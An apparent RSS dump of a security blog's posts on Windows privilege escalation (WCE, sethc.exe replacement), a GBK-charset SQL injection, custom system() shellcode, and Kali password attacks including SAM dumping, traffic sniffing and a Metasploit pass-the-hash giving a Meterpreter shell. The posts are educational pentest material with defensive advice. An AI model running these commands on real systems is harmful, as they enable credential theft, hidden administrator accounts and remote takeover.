Security – GoSecure! https://www.gosecure.it/blog MyDear(root)Shell Fri, 27 Jun 2014 14:53:35 +0000 en-US hourly 1 https://wordpress.org/?v=5.6 Privilege escalation using Windows Credential Editor https://www.gosecure.it/blog/art/539/sec/privilege-escalation-using-windows-credential-editor/ https://www.gosecure.it/blog/art/539/sec/privilege-escalation-using-windows-credential-editor/#respond Fri, 27 Jun 2014 16:28:19 +0000 https://www.gosecure.it/blog/?p=539 read more)]]> As I wrote in this article is often trivial to become local admin on MS system if there isn’t a strong and clear security policy, but it’s also the same in a Unix environment.
What is the next step? If an attacker becomes local admin of a company’s PC the next step is to become a more powerfull administrator; so, if the PC is joined to a Domain, the objective will be to become a Domain Admin in order to completly compromise the whole network.
Here’s a tool that can be used to reach this scope in particular conditions: Windows Credentials Editor (WCE v1.3 beta)
It’s quite simple to use:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>wce.exe -h
WCE v1.41beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)

Use -h for help.
Options:
        -l              List logon sessions and NTLM credentials (default).
        -s              Changes NTLM credentials of current logon session.
                        Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>.
        -r              Lists logon sessions and NTLM credentials indefinitely.
                        Refreshes every 5 seconds if new sessions are found.
                        Optional: -r<refresh interval>.
        -c              Run <cmd> in a new session with the specified NTLM credentials.
                        Parameters: <cmd>.
        -e              Lists logon sessions NTLM credentials indefinitely.
                        Refreshes every time a logon event occurs.
        -o              saves all output to a file.
                        Parameters: <filename>.
        -i              Specify LUID instead of use current logon session.
                        Parameters: <luid>.
        -d              Delete NTLM credentials from logon session.
                        Parameters: <luid>.
        -a              Use Addresses.
                        Parameters: <addresses>
        -f              Force 'safe mode'.
        -g              Generate LM & NT Hash.
                        Parameters: <password>.
        -K              Dump Kerberos tickets to file (unix & 'windows wce' format)
        -k              Read Kerberos tickets from file and insert into Windows cache
        -w              Dump cleartext passwords stored by the digest authentication package
        -v              verbose output.

Let’s try to run WCE using the -w option. Note that you must be a priveliged user to run this tool.

C:\Documents and Settings\Administrator>wce.exe -w
WCE v1.41beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)

Use -h for help.

Administrator\CLI01:Pa$$w0rdZ

C:\Documents and Settings\Administrator>

It’s pretty simple: WCE shows every passwords cached; in clear text.
Let’s assume that the pc CLI01 is joined to a domain and let’s see what happen if some service is started using domain admin password:

C:\Documents and Settings\Administrator>wce.exe -w
WCE v1.41beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)

Use -h for help.

Administrator\mydomain.local:MyPaZZw0rd_IsW3ry$tronG
Administrator\CLI01:Pa$$w0rdZ

WOW! The domain admin password stored locally is showed.

How many service are misconfigured in your network? Let’s hope very few because you are a very good sysadmin and no service starts with domain sensitive password, but what about social engeneering?
Each time a user is begging for a password for an installation or he asks to you something that leads to digit your admin password on his pc, is it a legittimate request or does he wants your password cached?
So, you domain admin, what kind of password do you use on company users pc? The domain-admin-super-God password or the local pc password?

Basing ourselves on this and the previous post let’s now compile an hypothetical roadmap from simple user to domain admin:
1- Boot the company Microsoft PC using a CD/DVD with a bootable operating System
2- Use the sethc “feature” to become local admin
3- Begging for a domain admin password (“Please I need the latest java update, but I need your password”, “I’m trying to add a new charset, but the pc is asking for an admin password…”)
4- Run WCE and become domain admin
5- Use some other tool like pstool and collect the password of every user of the network

I think that these are the defences that a network/system admin can adopt:
1- No external device boot allowed and PC and case locked
2- No remediation on this (may be some domain policy). Remember that also Linux has a level 1 booting.
3- Users are invasive and dangerous, even if they don’t want your password. So Always log on their PCs always with the lowest privileges you can.
4- WCE must blocked to users (AV rule, policy, firewall)
5- If an attacker reach this point you will probably spend the next weeks searching another job in another city

The scope of this post is to make system admininistrators and everyone else aware on how to take care about IT security.
Many times, working as sysadmin, we make mistakes, we are pressured and we sometimes left open ports saying “I will patch them later”, but we always have to remember what risks we are taking.
An attack, talking about computer and network, often starts from the bottom and, little by little, try to reach the top; a small door open gives the way for another gate an so on. This process is called Privilege Escalation.

]]>
https://www.gosecure.it/blog/art/539/sec/privilege-escalation-using-windows-credential-editor/feed/ 0
Sethc: Access to every PC and become local Admin https://www.gosecure.it/blog/art/500/sec/sethc-access-to-every-pc-and-become-local-admin/ https://www.gosecure.it/blog/art/500/sec/sethc-access-to-every-pc-and-become-local-admin/#respond Wed, 21 May 2014 22:14:47 +0000 https://www.gosecure.it/blog/?p=500 read more)]]> This article talk about to connetting to a pc when you don’t have password and:
– you have physical access to the pc
– you can boot from a CD/usb/other HD

This is an old method that I rediscovered after many years and, with big surprise, is still present on modern MS operating systems (win 7 and 8).
At the base of this “feature” I’m going to describe there is a windows executable: c:\windows\system32\sethc.exe (but it’s not the only way: you can also use shutdown.exe).

If you have a Windows system you can activate this program by pressing 5 times the left SHIFT, this operation runs the executable (sethc.exe).

There are two problems if you analyze this situation: first it can be runned also in the login screen before authentication, second the privilege used to run the executable is SYSTEM (in the login screen no user is already logged in)
This is quite terrible.
Before, in XP sp2 and early xp sp3, this file was used to escalate privilege whitout phisycal access to the pc: the file was accessible by everyone and was not locked by the system, so a user could remove the legittimate sethc.exe, copy the cmd.exe from the same folder and rename it in sethc.exe.

What was the window that poped-up when the user hits CTRL for 5 times after this alteration? A CMD shell! What was the privilege of this shell? System!
Luckily Microsoft patched this problem in late XP sp3 and now the file is locked and can’t be manipulated when the Operating System is started, but the setch.exe is still there.

Some weeks ago I had some problems to access a windows laptop (win 7 SP1). Although I had the authorization to access to it I didn’t have the password to enter and no options to recover it. so I tried this:
I put a linux bootable CD and boot the pc using it. Then I simply mounted the windows file system and used some command like this:

[root@localhost /]#  mkdir -p /media/c
[root@localhost /]#  mount -t ntfs /dev/hd02 /media/c
[root@localhost /]#  cd /media/c/Windows/System32
[root@localhost /]#  cp sethc.exe _sethc.exe
[root@localhost /]#  cp cmd.exe sethc.exe

Than I rebooted the system from HD and, when in the login screen, I simply pressed 5 times the left SHIFT.Ta-da! I got a SYSTEM shell.
I used a basic command line to create a new user and put it in Administrators group and, less than 5 minutes later, I had the full graphic control of the box.

This caused me a hundred of ideas, so, put aside this latop, I went on with my tests.
I tried it over a Win8 box, on a domain PC and against a server with strong domain policy and every time it worked fine.

So this is my assume (but you can refute):
If you have physical access and if you can boot from an external device (using bios or physically adding a new HD to the pc case) you can log into a Windows pc using SYSTEM privilege.

That’s why in every Company, that believe in IT security, the external device booting, the PXE, and the access to the PC case must be regulated.

ASAP I will write some example to become Domain admin strarting from this point, to highlight how dangerous is every litle door that a sys admin leaves open.

]]>
https://www.gosecure.it/blog/art/500/sec/sethc-access-to-every-pc-and-become-local-admin/feed/ 0
Mysql_escape_string: the charset vulnerability https://www.gosecure.it/blog/art/483/sec/mysql_escape_string-the-charset-vulnerability/ https://www.gosecure.it/blog/art/483/sec/mysql_escape_string-the-charset-vulnerability/#comments Wed, 16 Apr 2014 11:16:13 +0000 https://www.gosecure.it/blog/?p=483 read more)]]> The mysql_escape_string is a deprecated and vulnerable PHP function used to sanitize the user input before it reaches the mysql query.
It escapes most of special character that can be used by a malicious user to perform SQLi.

This is an exampre of how the function works:

root@bt:~# cat /tmp/esc_str.php
<?
        function escape_str($s)
        {
                $mystr = mysql_escape_string($s);
                echo "mystr is: " . $mystr . "\n";
        }
         escape_str(" ' \ ; A B ! % ");
?>

root@bt:~# php /tmp/esc_str.php
mystr is:  \' \\ ; A B ! %

In spite of this, as you can see, some sensible chars aren’t escaped like the % that can be useful in a LIKE query.

The mysql_escape_string have some vulnerability partially patched with the mysql_real_escape_string.
Particularly mysql_escape_string don’t require authentication and can be insert before the mysql_connect function.
This means that it doesn’t verify the database character encoding, but analyzes and sanitizes the string one byte at time also if the batabase encoding is multi bytes (GBK, UTF-8, Big5).

Take a look at this example of mysql authentication using PHP code:

function mysqllogin(){
   $db_name  = "db0001";
   $tbl_name = "tb0023";
   $user = mysql_escape_string($_POST["login_user"]);
   $pswd = mysql_escape_string($_POST["login_pswd"]);
   mysql_connect("127.0.0.1", "root", "toor")or die("No MYSQL connection");
   mysql_query("SET CHARACTER SET 'gbk'");
   mysql_select_db("$db_name")or die("No DB connection");
   $sql = "SELECT COUNT(*) FROM tb0023 WHERE user='$user' and pswd='$pswd'";
   $rsql = mysql_query($sql) or die(mysql_error());
   $rw = mysql_fetch_row($rsql);
   if ($rw[0]) {bf
      return 1;
   } else {
      return 0;
   }

If we suppose that the db encoding is GBK (in this case I forced it in the PHP code: mysql_query("SET CHARACTER SET 'gbk'")) we can try to take advantage of the use of different encoding type.
First of all let’s try to use PHP to see difference between GBK and ASCII, before and after mysql_escape_string()
Use the follow php sample:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ascii">
<title>PERU.local</title>
</head>

<body style="font-family:Verdana;color:#9bbbcb;">
<div style="text-align:center">

<div style="text-align:center;color:#ff0000;">
=========================================================<br>
This is a php page with ASCII charset<br>
---------------------------------------------------------<br>
The string passed to mysql_escape_string is \xBF\x27<br>
The output of mysql_escape_string is \xBF\x5c\x27<br>
<br>
=========================================================<br>
</div>
<div align="center">
<table style="margin-top:50px;">
<tr>
<td style="text-align:right">
<?
$lol =  "\xbf\x27";
$lol2 = mysql_escape_string($lol);
?>
<strong>--------</strong>
</td>
<br><br>
<? echo "This is the string before mysql_escape_string: " . $lol ; ?><br>
<? echo " --- "; ?><br>
<? echo "This is the string after mysql_escape_string: " . $lol2; ?><br>
<td style="text-align:left">
</table>
</div>
</form>
</div>
</body>
</html>
ascii

Image 1

Now modify the previous sample and load it:

...
<meta http-equiv="content-type" content="text/html; charset=gbk">
...

gbk

Image 1


As you can see in image 2 the escape (\) char is no longer displayed, this because the mysql_escape_string output is \xbf\x5c\x27
This output is encoded by ASCII (a single character charset) as “\xbf” (an inverted question mark), “\x5c” (\ the escape char) and “\x27” (‘ a single quote).
On the other side (gbk – multibytes) the output is encoded in “\xbf\x5c” (a kanji) and \x27 (‘ a single quote).

Ok, the string that reaches the MySQL will be \xbf\x5c\x27; now, if the charset on MySQL is GBK, the behaviour will be the same of the PHP page: a kanji and a single quote that is what we need for a SQLi.
In the image 3 you can see actually the result:

sqli

Image 3

The only encoding I found to be vulnerable are GBK and BIG5 because are the only that have \x5c as second byte of an allowed character.
But you can explore more by referring to this site.
Also I can’t find a way to force the DB chatset before MySQL connection, so I suppose that SQLi can be reached only if the GBK is already the BD charset.

You can try to read the following posts to get more info about mysrl_real_escape and this kind of vulnerability:
https://security.stackexchange.com/questions/8028/does-mysql-escape-string-have-any-security-vulnerabilities-if-all-tables-using-l
https://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html
https://stackoverflow.com/questions/5741187/sql-injection-that-gets-around-mysql-real-escape-string
https://stackoverflow.com/questions/3665572/mysql-escape-string-vs-mysql-real-escape-string
https://www.sans.org/reading-room/whitepapers/application/web-application-injection-vulnerabilities-web-app-039-s-security-nemesis-34247

]]>
https://www.gosecure.it/blog/art/483/sec/mysql_escape_string-the-charset-vulnerability/feed/ 3
Create a custom shellcode using System() function https://www.gosecure.it/blog/art/452/sec/create-a-custom-shellcode-using-system-function/ https://www.gosecure.it/blog/art/452/sec/create-a-custom-shellcode-using-system-function/#comments Mon, 20 Jan 2014 16:40:15 +0000 https://www.gosecure.it/blog/?p=452 read more)]]> Recently I have to write a custom shellcode that accommodate some specific features. Basically I have to avoid the use of some functions like WinExec() and ShellExecute() to create a remote code execution and insert it as payload in a test exploit.
I have to search some other function that allow me to execute command on a remote PC and I found it in the System() call function. I’m not a skilled developer, so what described below is my working solution, maybe not the better solution.

I’m not talking here about the exploit, but only about the shellcode creation and choices motivations. This exemple can be easly fit to other situations and replicated without inserting it in an exploit, but simply tested in a developer or in a custom binary file.

I started from this sample code. It uses the Windows API function MessageBoxA to popup a message

[BITS 32]

mov ebx, 0x00584148 ; Loads a null-terminated string “HAX” to ebx
push ebx ; pushes ebx to the stack
mov esi, esp ; saves null-terminated string “HAX” in esi
xor eax, eax ; Zero our eax (eax=0)
push eax ; Push the fourth parameter (uType) to the stack (value 0)
push esi ; Push the third parameter (lpCaption) to the stack (value HAX\00)
push esi ; Push the second parameter (lpText) to the stack (value HAX\00)
push eax ; Push the first parameter (hWnd) to the stack (value 0)
mov eax, 0x7E45058A ; Move the MessageBoxA address in to eax
call eax ; Call the MessageBoxA function with all parameters supplied.

Looking up the MessageBoxA function in Google reveals four arguments:

int MessageBox(
  HWND hWnd,
  LPCTSTR lpText,
  LPCTSTR lpCaption,
  UINT uType
  );

So the sample code pushes in the stack all the arguments and then call the address of the function already loaded in memory.

Some things to underline:
– at the end of every argument a null byte is insered (\x00)
– the arguments are pushed in reverse order into the stack (LIFO)
– this is only a shellcode and it has to be appended to a program; this program must have the function MessageBoxA (user32.dll) loaded in memory.
– the address of the function (0x7E45058A) is hadrcoded and works only on the Operating System the shellcode is written for.
– the hardcoded address doesn’t work in random space address context (ASLR or EMET)

Starting from this sample I want to use the System() function to pass commands to the interpreter (typically CMD.EXE); I search in MSDN specifications and I found that it needs only one parameter: the command I want to pass.

system(
  "echo A>%tmp%\xx.txt"
  );

First I have to determinate, using the debugger, if the function is loaded in memory, so in Olly I search for “Names in all modules” and, luckly I found it in the msvcrt.dll (Figure 1) at address 0x77BF93C7 (Figure 2).

Figure 1

Figure 1


Figure 2

Figure 2


Ok, now I have to convert the string “echo A>%tmp%\xx.txt” in hex, cut it in groups of 4 bytes and invert the order of the groups; also I have to remember to insert the NULL byte at the end of the hex string. These groups will be insered in the stack using the push command and then will group it adding a pointer to the stack.

root@bt:~# echo -ne 'echo A>%tmp%\xx.txt\x00' | xxd -ps | fold -w8 | tac
74787400
5c78782e
746d7025
20413e25
6563686f

So the testing shell code will be like this:

[BITS 32]

PUSH 0x74787400 ; push into the stack, in reverse order, the command 'echo A>%tmp%\xx.txt' adding a NULL byte
PUSH 0x5c78782e
PUSH 0x746d7025
PUSH 0x20413e25
PUSH 0x6563686f
MOV EDI,ESP ; adding a pointer to the stack
PUSH EDI
MOV EAX,0x77BF93C7 ; calling the System() function using the hardcoded address (XP SP3)
CALL EAX

Ok, now I have the test shellcode; I can do it directly in Olly. I open the debugger, attach a program, edit the first few lines, put a brake point at the end of my code and run the program (Figure 3).
Remember that the msvcrt.dll must be one of the module loaded by the program attached to the debugger.

Figure 3

Figure 3


Once the shellcode is ended I verify its work: I go to %tmp% folder and search for the xx.txt file, if all is ok I can insert a better command like net user test Pa$$word1234 /add & net localgroup administrators test /add & net localgroup "Remote desktop users" test /add

Note that the net user/net localgroup need the admin privilege to be executed, so in a real exploit the target program must be started using elevated rights. On the other hand the first command, the echo one, will work also with low privilege.

]]>
https://www.gosecure.it/blog/art/452/sec/create-a-custom-shellcode-using-system-function/feed/ 3
The Password Attacks on Kali Linux. [Part 2] https://www.gosecure.it/blog/art/425/sec/the-password-attacks-on-kali-linux-part-2/ https://www.gosecure.it/blog/art/425/sec/the-password-attacks-on-kali-linux-part-2/#respond Wed, 06 Nov 2013 12:55:12 +0000 https://www.gosecure.it/blog/?p=425 read more)]]> This is a part of my article “The Password Attacks on Kali Linux” published on PenTest Magazine.
I have the right to do up to 100 downloads of that magazines, so If you are interested on it you can download PenTest Extra 04_2013 for free using the following link. The only thing you need is a free registration.
PenTest Extra 4_2013

The Password Attacks on Kali Linux [Part 2]

Offline Password attack
The service that use as authentication a keyword needs to store it somewhere and somehow. Think about /etc/shadow or SAM in Windows, but also browsers, routers, switches and any kind of client (ftp, e-mail, smb). The password can be stored in clear text, in databases or hashed in files; every time you copy these files and then you try, even in other environment, to extract the passwords you are doing an offline password attack. With administrative rights is possible, for example, to dump password hash from Windows and Linux system. The same operation can be done mounting the target system disk on the Kali system, also without credentials, or starting the system to attack using a bootable Kali distribution.
Files that contain hashed or plaintext passwords can be found in every place: sometimes the database backup is directly hosted in a web folder, let alone files named password.txt that can be found directly using Google; also htaccess and htpasswd can be dumped sometimes. FTP client, zip files, RDP connection files are a mine of keywords easy to collect too. Sniffing traffic waiting for a pop3/ snmp clear-text request or taking a 4 way handshake from an access point are just other options you have to perform an offline attack.
Remember that keys are often reused throughout the network, so a complex password simply sniffed with Wireshark in a not encrypted packet like pop3 (see Figure 1) can be the same unbreakable and encrypted 15-chars password used for ssh service.

A sample of packet sniffing using Wireshark

Figure 1

Windows SAM file and Linux shadow
Windows stores the hash of local passwords in a file named SAM “Security Accounts Manager” present in c:\windows\system32\config\. Of course the file isn’t plain text, but it has to be merged to another file (SYSTEM) present in the same folder. The union of these two files leads to a readable one where you can see the passwords hash just like thise in Figure 2.
These two files can be accessed only when the operating system is down or using tolls like PWdump or FGdump. The other choice is to dump the system backup of these; in fact, up to Windows Vista, you can find them in c:\windows\repair\ folder. To merge the SAM and the SYSTEM file you can use bkhive and samdump2; after getting the hash, John the Ripper is used to extract the password.

root@kali:~# bkhive /mnt/ntfs/Windows/System32/ config/SYSTEM /tmp/bootkey
root@kali:~# samdump2 /mnt/ntfs/Windows/System32/ config/SAM /tmp/bootkey > /tmp/win_hash.txt
root@kali:~# john /tmp/win_hash.txt

As said previousely, if you own the target machine, you can take advantage of tools like FGdump too or, if you have established a meterpreter session, of the hashdump command (see Figure 2).

The hashes extracted using hashdump command in Metasploit

Figure 2

Note that you need to be Admin or System to launch these commands and you have to upload to the target machine some lines of code that sometimes can be blocked by antivirus.
Since it’s one of the “most wanted” tools, let’s see also JtR in action:

root@kali:~# john /tmp/win_hash.txt
Loaded 15 password hashes
NINAANI (nina:1)
(peru)
PASSWOR (Administrator:1)
PASSW0R (user:1)
AAAAAAA (jasmine:1)
N (nina:2)
D (user:2)
D (Administrator:2)
COS (nick:2)
A1 (jasmine:2)
DE (albert:2)
CR3T (joy:2)
CYBERDU (albert:1)

Note that most passwords are immediately decrypted (nina, administrator, user, jasmine, albert, peru) when others only in part.
This is caused by the old windows method to store password called LM. This kind of hashing, putted next to the newer NTLMv2, is present by default up to Vista to guarantee the backward compatibility. LM can be disabled and Microsoft recommended that, but de facto this is a vulnerability that users are carrying on for many years.
The LM hash works as follow:
• the user password is converted in an all upper case string;
• the password is cutted after 14 bytes (max password length);
• the password is splitted in 2 pieces of 7 bytes max;
• this two pieces are encoded using DES.
This is a simple view of what is LM, but your interest is that JtR has the task to crack an hash with no more than 7 chars-upper-case. This is really different from finding a key with 14 chars, upper and lower case. in addition to this DES kind of encrypting is well known and john use this to speed up the work.

Also, Linux stores keys in two files: /etc/passwd and /etc/shadow. In this case it’s not essential the merge of the two files, but it’s better for decrypting. You can use the JtR command unshadow to join the two.
In Kali Linux you will be able to call any tool from anywhere on the system as every application is included in the system path so you can call unshadow and john just like this:

root@kali:~# unshadow /etc/passwd /etc/shadow > psw_file

Then you use john to decrypt:

root@kali:~# john psw_file

Sometimes you can try to use john on /etc/shadow without unshadowing it, but in this case john will not use the GECOS info (complete name, telephone number…) that helps to perform a better crack. Also the use of some features like -shells will be lost if you don’t perform the unshadow.

Some small words about using Google as hash cracker.
Google is a big container of everything. It’s not unusual to take an encrypted string, paste it in the browser and find the key.
One of the easiest hash to find is the MD5 one. The Message Digest algorithm 5 is an old method of hashing; it is already obsolete and insecure, but users and programs still employ it to encode passwords. If you try to paste an MD5 string in Google you’ll likely find it. Before trying everything else paste the hash in the search engine or use some online rainbowtable program.

The cache and the sniffing
Although the cache and the packet analysis are not pure offline password attacks, they deserve to be mentioned. If you finally own a PC in the net you have to test, squeeze it. Extract all what you are able to take.
First start a sniffing session using Wireshark or, if you can’t, use Ettercap to perform a man in the middle and wait for unencrypted password. These are some normalized output of Ettercap. The first is the capture of a webmail account on an insecure http page instead of more secure https:

root@kali:~# ettercap -T | grep password
webmail_username=nina&webmail_password=ThisIsMyPAZZWORd HTTP/1.1 302 Found.

Then some capture of POP3 and FTP packets:

root@kali:~# ettercap -T | grep PASS
PASS $$up3rPasW0rsS3creT.
FTP : 192.168.34.140:21 -> USER: adminftp  PASS: $$up3rPasW0rsS3creT
PASS jaK3T0ftP.
FTP : 192.168.34.140:21 -> USER: Jake  PASS: jaK3T0ftP
PASS #pa$SW0rd>>ma1L2013!.
POP : 192.168.34.140:110 -> USER: albert  PASS: #pa$SW0rd>>ma1L2013!
PASS AAAAaaaa1.
POP : 192.168.34.140:110 -> USER: jasmine  PASS: AAAAaaaa1

This is why is always better to use an ssl version of all protocols, also in internal communications.

If you have access to a PC search for client’s programs like FileZilla or browsers and take note of passwords archived using meterpreter or search in Internet where the client stores it:

msf  post(filezilla_client_cred) > exploit

[*] Parsing recentservers.xml
[*]  Collected the following credentials:
[*]  Server: 192.168.34.131:21
[*]  Protocol: FTP
[*]  Username: nina
[*]  Password: ninaanin

[*]  Collected the following credentials:
[*]  Server: 217.115.1.1:21
[*]  Protocol: FTP
[*]  Username: joy
[*]  Password: $$ecr3t12

[*]  Collected the following credentials:
[*]  Server: 217.115.1.2:21
[*]  Protocol: FTP
[*]  Username: admin
[*]  Password: FTPCr3dz1209

[*] Post module execution completed

Then use ms-cache option of JtR or program like Windows Credentials Editor that locate system cached password: if you are lucky a sysadmin has been logged or some service is misconfigured and the password is stored (not encoded) in the cache.
In the following case of study the user HP\Nina, present in Domain Administrators group, is simply logged on. In this machine is present an agent misconfigured that use HP\administrator credential to work:

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Documents and Settings\nina>wce.exe -w
WCE v1.3beta (Windows Credentials Editor)
   by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

HP-SRV01$\HP:<contains-non-printable-chars>
nina\HP:ninaanin
Administrator\HP:password
C:\Documents and Settings\nina>

Note that cache keys “ninaanin” and “password” are not encoded.

SMB pass-the-hash
Like in the previous example, not always you’ll have to spend time in decrypting operations. Sometimes you can use the hash you get as it is. Ok, you can’t take the string and just paste it in a authentication window request and login using Remote Desktop, but there is a quite controversial feature in Windows on the authentication management of shared folders.

Consider this example:
Computer A has a c:\share and Computer B tries to connect to that share. B sends its credential in hash format (“hello! I am Administrator and my password is e52cac67419a9a224a3b108f3fa6cb6d”) and A verify if it has this credential, if so it connects Computer B to the share. If not it prompts for username and password.
All this process is in clear text!
So, what about If the Computer A is an attacker and has a network sniffer? It collects the Computer B hash! Now attacker on Computer A can try to decode the hash, but not only that. He can use Metasploit, taking advantage of the module pass the hash, and own the B machine.
He uses the Administrator hash to connect to ADMIN$ of B and execute some code like reverse shell. The SMB_relay exploit, present in Metasploit, has everything you need to test this Windows vulnerability: it creates a fake sharing folder, captures the hash, pushes a payload and establishes a connection. Of course the pass the hash function can be also used with hashes previously collected:

root@kali:~# msfcli exploit/windows/smb/psexec RHOST=192.168.34.135 SMBuser=Administrator
SMBPass=E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C E

RHOST => 192.168.34.135
SMBuser => Administrator
SMBPass => E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
[*] Started reverse handler on 192.168.34.140:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.34.135:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \QxsHwGjv.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.34.135[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.34.135[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (OihQHhAa - "MZqTViuX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \QxsHwGjv.exe...
[*] Sending stage (752128 bytes) to 192.168.34.135
[*] Meterpreter session 1 opened (192.168.34.140:4444 -> 192.168.34.135:1534) at 2013-08-01 10:10:44 -0400

meterpreter > sysinfo
Computer        : HP-SRV01
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32

meterpreter > shell
Process 3816 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>shutdown -s -t 00 -c "ByeBye!"
shutdown -s -t 00 -c "ByeBye!"

Are you still secure to connect to a network shared folder? So, if you have to secure a network, remember the users: force a strong domain policy, patch the systems, use SSL wherever you can, set different passwords for different services and, above all, educate the people.

]]>
https://www.gosecure.it/blog/art/425/sec/the-password-attacks-on-kali-linux-part-2/feed/ 0
The Password Attacks on Kali Linux. [Part 1] https://www.gosecure.it/blog/art/391/sec/the-password-attacks-on-kali-linux-part-1/ https://www.gosecure.it/blog/art/391/sec/the-password-attacks-on-kali-linux-part-1/#respond Fri, 27 Sep 2013 15:49:42 +0000 https://www.gosecure.it/blog/?p=391 read more)]]> This is a part of my article “The Password Attacks on Kali Linux” published on PenTest Magazine.
I have the right to do up to 100 downloads of that magazines, so If you are interested on it you can download PenTest Extra 04_2013 for free using the following link. The only thing you need is a free registration.
PenTest Extra 4_2013

The Password Attacks on Kali Linux [Part 1]

What is the weakest part of the security chain? You know the answer: the one who stand between the keyboard and the desk chair. And what does this user do on her/his first job day? Set a password. Yes, a big part of our security environment lies around that password.

Of course we talk about internal password because Nerwork Administators have well learned the lesson and secure their external accounts with encryption, strong policy, access restriction; in spite of this the internal accounts are the heaven for hackers (and the hell of sysadmins).
Nowadays internal users are, fortunately, low-privileged and some kind of policy forces a little of security, but even if your policy is set with more than 8 characters with numbers, upper and lower case, there will be a user that set as password something like AAAAaaaa1 or Password1.

The complete takeover of a net is a stairway that goes through information gathering, network discovering, password cracking and system owning. Also, finding a low-privilege password is one stair over and it’s actually one of the biggest gap that a penetration tester has to pass. If you find a password, you can quickly test it on other systems and services previously discovered (ssh, ftp, mail): users have the bad routine to use the same keyword for different services.
When you discover a password, you can make an idea about the security company policy and you can try a widespread brute-force attack. If you find, for example, a key of 8 characters, all low case, you can try an attack using this setting on all systems of the LAN. Even if you find a key word from user that isn’t administrator or root there are lot of well-known privilege escalations that can be attempted, especially for old or unpatched system.
Other options that can be used, when you owned a PC with an unprivileged account, are: sniffing traffic,
extracting stored credentials or pivoting other attacks. All these things lead you over and over inthe stairway. In substance, a right association user-password is one of the core success on a pentest and it’s all trusted to an user and his password, that he has chosen on his first job day.

Some terms
Let’s start making a specification. There are two common names you can hear talking about password attack: BruteForce and WordList.
Brute force is when the password is tested using all designated characters, using a set length. The following is an example: use character ‘a’, ‘b’ and set length 2. The password that will be tested are aa, bb, ab and ba; these are 4 tries. You can calculate the amount of attempts: quantity of characters elevated to length used, in this case 2^2=4. Because it is an exponential, it can be become very difficult to test something with ten characters using full ASCII set: according to Password time calculator by lastbit.com this BruteForce attack will take up to 4274902 years.
BruteForce attack, but a WordList one, where what will be used as keys are all single words present in one list.
Note that the password used is exactly the same written in the list. So if in the document there’s the word ‘backup’ only this word will be tested and not ‘Backup’ or ‘back-up’; fortunately there are programs that make these permutations automatically.
So wordlists are often a smarter attempt than a bruteforce attack; in spite of this, during a pen test, you must have a very strong reason to spend hours for this kind of attack.
Of course the following password attacks are done using Kali Linux, because it has every tool you’ll need. Thanks to OffensiveSecurity, Kali Linux, like its father BackTrack, is one of the most used pentesting distributions. If you are reading here you known what we are talking about.

Create your user and password list
To perform a wordlist attack you need, of course, a list of words. There are many techniques to create it, and many places where you can find a precompiled one, but the best way is to create a document based on your needs. From my personal opinion, in this case, is necessary to start from locating valid usernames from the network I‘m testing and using these as a first simple list, trying blank, username as password or very simple passwords.
The harvest, by Edge-Security Research, is a very useful tool that helps you by searching for a company name in various resources database (Google, Linkedin, PGP, Bing…) and then extracts for you probable user names. In the Figure 1 you can see the result of a research: maybe vdiaz, cdelojo and cmartorella are also FTP, SSH or RDP users.
Then you can try to locate some useful accounts from the company website: e-mails and documents such as pdfs, docs or similar can be downloaded to gain such information. You can automate the operation by using another tool by Edge-Security Research: metagoofil (see Figure 2).

TheHarvest is very useful in user discovery

Figure 1

The Metagoofil report

Figure 2

Another way to find usernames, when you are in the testing-Company LAN, is to locate a mail server and an SNMP service. Mail server can be vulnerable to VRFY command and you can use it to probe the system for login names. The VRFY is a licit command and fortunately, in modern system, is disabled to patch this security issue, but sometimes you can still use it. Let’s look how it works using a simple Netcat connection:

root@kali:~# nc -nv mailserver.fakesite.lab 25
(UNKNOWN) [10.0.7.14] 25 (smtp) open
220 mailserver.fakesite.lab ESMTP Sendmail 8.13.7
VRFY freddie
550 5.1.1 freddie... User unknown
VRFY root
250 2.1.5 root <root@fakesite.lab>
VRFY test
550 5.1.1 test... User unknown

If the system is vulnerable, smtp-user-enum program can be used to get some usernames; the following is the basic command to use it:

root@kali:~# smtp-user-enum -M VRFY -U users.txt -t 10.0.7.14

Note that the option -U uses a wordlist in order to find names. If you haven’t one you can find some preloaded in Kali using a command like this:

root@kali:~# find / | grep users.txt

However the suggestion is to keep your list under 100-150 names. Smtp-user-enum can also be used to test the EXPN function; EXPN is similar to VRFY, but it is used on distribution list and it lists all its users. This can be a bigger problem than the VRFY since sites sometimes have an alias such as “all”.
Another way to compile your focused user list is SNMP analysis. SNMP is a protocol based on UTP that is often used to monitor servers’ service status.
The distribution lists (community strings) are passed in clear and often have the default state (public or private), so you can easily try to find it in order to query the server and get many information.
You can use a combination of Onesixtyone and Snmpcheck; the first can be used to enumerate community strings, so, after locking on the hosts with SNMP service, the program can be run.

